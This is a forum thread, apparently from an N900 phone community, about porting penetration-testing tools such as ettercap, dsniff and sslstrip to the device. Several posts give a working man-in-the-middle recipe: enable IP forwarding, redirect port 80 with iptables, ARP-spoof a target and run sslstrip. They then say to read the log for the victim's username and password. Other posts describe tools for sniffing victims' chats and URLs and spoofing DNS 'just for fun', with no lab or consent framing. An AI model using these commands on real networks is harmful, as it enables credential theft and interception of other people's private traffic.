Active Topics

 



Notices


Reply
Thread Tools
Posts: 529 | Thanked: 194 times | Joined on Aug 2010 @ UK
#171
http://dl.dropbox.com/u/44965378/N900%20mods/karam.zip

sorry for the wait ... add link to first page if you like ..


Originally Posted by karam View Post
omg omg omg omg

i'm so shy from u guys
can some one upload karam.tar.gz to some where ??
i can't download it from mega nor any site uploaded to !!

i need it for packaging libs from it to run arpspoof in repos !
__________________
METASPLOIT INSTALL N900
Keep the forums clean
Dont forget to say thanks

Last edited by stevomanu; 2012-01-26 at 17:47.
 

The Following User Says Thank You to stevomanu For This Useful Post:
Posts: 63 | Thanked: 27 times | Joined on Apr 2011
#172
TO KARAM:

i have talked with other people who has the N900 and MITM attacks no longer wornking in the N900, when you run ettercap or any other program who needs promiscuous mode, the conection get stuck and you can't sniff any packet or navigate with the N900. I have trying to reflash and nothing work, I use:

kernel power 49 with CSSU testing

but i have trying with kernel power 46, 47, 48 and nothing there is some packet or dependency or something thas has screw up the whole promiscuous mode in the N900.

Do you have the same problem??

- Good news!! Recently the projetc ettercap has been reborn after 8 years of no actualization with a new version, ettercap 0.74 lazarus, it is a shame we don have this newer version compile for the N900, i have tried the new version in my desktop pc and runs great.

- I have a question for you, are you developing for the N9 ?? because we still doesn't have in the N9 nothing of pentesting material, no ettercap, no wireshark, no nmap, no arpspoof, no aircrack, no metasploit nothing. I will be great have someone of your expertice and knowledge developing for N9, because with 1 GB of RAM it will be the perfect pentesting mobile machine.

Karam thanks for the great work you are for sure one of the biggest experts in the community.

Last edited by -Tyler-; 2012-01-26 at 20:02.
 
Posts: 856 | Thanked: 1,681 times | Joined on Apr 2010 @ Aleppo ,Syria
#173
it's actually true that ettercap makes the connection horrible when using it on N900

that's why i have just finished uploading arpspoof (as package name dsniff)
which is already confirmed to not slowing down the connection as ettercap does especially when running heavy sniffs such as sslstrip and YAMAS script (Based on sslstrip)

soon this problem will be solved for N900 as arpspoof will be the dependency of yamas

and for N9
unfortunately i don't have one

so till i get one (maybe will never)
then i will port hacking tools to it

PS: ettercap re alive is awesome
will contact the author of the ettercap package to port it to N900 (it's very easy to do)
 

The Following 7 Users Say Thank You to karam For This Useful Post:
Posts: 856 | Thanked: 1,681 times | Joined on Apr 2010 @ Aleppo ,Syria
#174
i would like to ask you guys to test the new arpspoof
with sslstrip before comax adapte it to YAMAS

Code:
sudo gainroot
Code:
apt-get install dsniff sslstrip iptables
#press y
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port #pickupanemptyport
arpspoof -i wlan0 -t #target #routerip
sslstrip -l #thesamepickedupnumber
then try to access ex:hotmail from PC
then CTRL+C
then see the sslstrip.log
you should see the pass and the username
 

The Following 2 Users Say Thank You to karam For This Useful Post:
Posts: 372 | Thanked: 61 times | Joined on Jan 2012
#175
@ karam- so arpspoof will just make yamas faster right? karam is it possible to control the hosts? which website they are visiting. redirecting them to something differnt.just for fun.cz i tested it with my pc. it just gives the login info and website. cant do anythng abt it? jst hav to watch it??

and last but not the least- i just love your work man. the speed and battery patches and now this. just proud to be amember of this community. thanks man
 
Posts: 856 | Thanked: 1,681 times | Joined on Apr 2010 @ Aleppo ,Syria
#176
yes that's true
and another yes
it's possible

with the same package i uploaded (dsniff)
there is something called dnsspoof
it does the job
but i'll explain later because i don't have enough time now
and i'm honored to be in this community too

PS : dsniff package has those sniffing tools:
arpspoof dnsspoof dsniff filesnarf macof mailsnarf msgsnarf sshmitm sshow tcpkill tcpnice urlsnarf webmitm

ex : msgsnarf will allow you to sniff chat froma victim
and urlsnarf will get you the urls of the victim
and so on

and PS2: i still have many to do like airdrop-ng and hamster ,charon,mdk3,cowpatty ,driftnet
puff many work to do
short time i have
but i will be free after exactly 4 months(long time though) because of my stup*d bakaloriat
 

The Following 7 Users Say Thank You to karam For This Useful Post:
Posts: 146 | Thanked: 39 times | Joined on May 2010
#177
sudo gainroot
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 333
arpspoof -i wlan0 -t 192.168.0.2 192.168.0.1
sslstrip -l 333

No luck...
I can not open no pages ( chrome, firefox) no internet ...

ps
try as well 8080 still no luck
 
Posts: 372 | Thanked: 61 times | Joined on Jan 2012
#178
Originally Posted by karam View Post
yes that's true
and another yes
it's possible

with the same package i uploaded (dsniff)
there is something called dnsspoof
it does the job
but i'll explain later because i don't have enough time now
and i'm honored to be in this community too

PS : dsniff package has those sniffing tools:
arpspoof dnsspoof dsniff filesnarf macof mailsnarf msgsnarf sshmitm sshow tcpkill tcpnice urlsnarf webmitm

ex : msgsnarf will allow you to sniff chat froma victim
and urlsnarf will get you the urls of the victim
and so on

and PS2: i still have many to do like airdrop-ng and hamster ,charon,mdk3,cowpatty ,driftnet
puff many work to do
short time i have
but i will be free after exactly 4 months(long time though) because of my stup*d bakaloriat
ok. that would be just great. so i hav to wait for like 4 months to get a tutorial for dsniff? anyone around who can help me a bit to do all that karam has mentioned? thanks. and best of luck karam
 
Posts: 195 | Thanked: 96 times | Joined on May 2011
#179
it worked with me
is arpspoof -i wlan0 -t router targer ? or only target router?
q6600 maybe your computer is using a proxy
 
Posts: 63 | Thanked: 27 times | Joined on Apr 2011
#180
Originally Posted by karam View Post
i would like to ask you guys to test the new arpspoof
with sslstrip before comax adapte it to YAMAS

Code:
sudo gainroot
Code:
apt-get install dsniff sslstrip iptables
#press y
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port #pickupanemptyport
arpspoof -i wlan0 -t #target #routerip
sslstrip -l #thesamepickedupnumber
then try to access ex:hotmail from PC
then CTRL+C
then see the sslstrip.log
you should see the pass and the username
i have tested it with arpspoof and it works perfect!! but it work perfect with sslstrip v0.7!!! with sslstrip v0.9 the connection get stuck the majority of times.

How is it going the ettercap 0.74 thing?? you already contact with the maintainer of the packet?? maybe with the new version of ettercap the connection dont get stuck, because altough arpspoof do the job well, ettercap with all is plugins and filters gives a more complete MITM experience

I would love to know how to compile pentesting programs to be able to port it to N900 and N9. some tutorial, book o guide you recommend me?? i really admire your contribution to this community.
 
Reply

Tags
dangerous, hacker edition, i iz hax0r, karam2hacker, noobs-cant-read


 
Forum Jump


All times are GMT. The time now is 02:25.